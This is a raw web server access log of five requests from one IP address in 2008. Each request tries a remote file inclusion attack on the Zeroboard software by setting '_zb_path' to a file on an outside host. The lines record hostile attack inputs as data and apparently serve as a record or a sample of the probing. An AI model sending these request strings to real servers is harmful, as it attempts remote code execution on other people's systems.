222.236.47.182 - - [10/Nov/2008:09:55:36 -0800] "GET /logs//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 200 73026 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:09:55:36 -0800] "GET /?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 200 94732 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:09:55:37 -0800] "GET /logs/access_071214.log//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:09:55:37 -0800] "GET /logs//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 200 73026 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:09:55:38 -0800] "GET /?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 200 94732 "-" "Mozilla/5.0" "www.dmulk.com"
